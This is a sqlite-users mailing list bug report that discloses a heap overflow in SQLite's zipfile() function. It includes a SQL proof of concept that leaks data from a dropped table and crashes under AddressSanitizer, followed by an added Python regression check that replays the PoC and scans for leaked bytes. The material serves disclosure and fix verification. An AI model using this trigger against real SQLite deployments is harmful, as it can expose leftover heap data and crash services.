Hi,
We found a heap overflow bug in sqlite, which leads to crashing and memory
dumping.
Here is the PoC:
—
create table v0(v1 char);
insert into v0 values ('1');
create table v2(v3 text);
-- Rows whose bytes later reappear in the hex() output of v0.
insert into v2 values
("111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"),
("2222222222222222222222222222222222222222222222222"),
("3333333333333333333333333333333333333");
drop table v2;
-- zipfile() called with a NULL data argument, three times over the growing table.
insert into v0 select zipfile(v1, NULL) from v0;
insert into v0 select zipfile(v1, NULL) from v0;
insert into v0 select zipfile(v1, NULL) from v0;
-- The output contains bytes that belonged to the dropped table v2.
select hex(v1) from v0;
—
From the hex result we can spot the data in the deleted table v2. And if we run
it with address sanitizer, we get a heap overflow crash.
The bug exists in the up-to-date release code and the development code.
Yongheng & Rui
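The following is an added regression check, not part of the report above or of SQLite's own test suite. It replays the posted statements through Python's sqlite3 module and applies the reporters' own observation as a test: does the hex(v1) output contain bytes that belonged to the dropped table v2? The extension path ZIPFILE_EXT is a placeholder assumption (zipfile() is implemented in ext/misc/zipfile.c and is not compiled into most sqlite3 libraries), so the replay is skipped when the function is unavailable. On a vulnerable build compiled with AddressSanitizer the process aborts instead, which is the other signal the report describes.

```python
"""Regression check for the zipfile() heap over-read reported on the list.

Added example, not part of the original post. Replays the PoC in an
in-memory database and scans hex(v1) for bytes from the dropped table v2.
"""
import sqlite3

# Placeholder: path to a loadable build of ext/misc/zipfile.c, or None to use
# whatever the linked SQLite library already provides.
ZIPFILE_EXT = None

# The three v2 rows from the posted PoC, copied verbatim.
V2_ROWS = (
    "111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111",
    "2222222222222222222222222222222222222222222222222",
    "3333333333333333333333333333333333333",
)

# The posted statements, with v2's values taken from V2_ROWS and written as
# standard single-quoted literals (SQLite treats the original double-quoted
# form as string literals when the text matches no column name).
POC_SETUP = "\n".join([
    "create table v0(v1 char);",
    "insert into v0 values ('1');",
    "create table v2(v3 text);",
    "insert into v2 values " + ", ".join("('%s')" % r for r in V2_ROWS) + ";",
    "drop table v2;",
] + ["insert into v0 select zipfile(v1, NULL) from v0;"] * 3)


def leaked_fragments(hex_rows, secrets, min_run=8):
    """Return the secrets (in input order) whose bytes reappear in hex() output.

    zipfile() returns a zip container, so over-read bytes sit inside a longer
    hex string; a secret counts as leaked when at least `min_run` consecutive
    bytes of it occur in some row. Pure function, testable without SQLite.
    """
    rows = [r.upper() for r in hex_rows]
    leaked = []
    for s in secrets:
        raw = s.encode("utf-8")
        windows = {raw[i:i + min_run].hex().upper()
                   for i in range(0, max(1, len(raw) - min_run + 1))}
        if any(w in row for w in windows for row in rows):
            leaked.append(s)
    return leaked


def run_poc(ext_path=ZIPFILE_EXT):
    """Replay the PoC; return the hex(v1) rows, or None if zipfile() is absent."""
    con = sqlite3.connect(":memory:")
    if ext_path is not None:
        con.enable_load_extension(True)
        con.load_extension(ext_path)
    try:
        con.executescript(POC_SETUP)
        rows = [r[0] for r in con.execute("select hex(v1) from v0")]
    except sqlite3.OperationalError as exc:
        if "no such function" in str(exc):
            return None
        raise
    finally:
        con.close()
    return rows


def check_build(ext_path=ZIPFILE_EXT):
    """Return 'skipped', 'clean' or 'leak' for the linked SQLite build."""
    rows = run_poc(ext_path)
    if rows is None:
        return "skipped"
    return "leak" if leaked_fragments(rows, V2_ROWS) else "clean"


if __name__ == "__main__":
    print(check_build())
```

Run it against the build you want to verify; a result of "clean" after a fix, and "leak" (or an ASan abort) before it, gives a repeatable pass/fail criterion for the bisect and the release test.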
_______________________________________________
sqlite-users mailing list
[email protected]
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users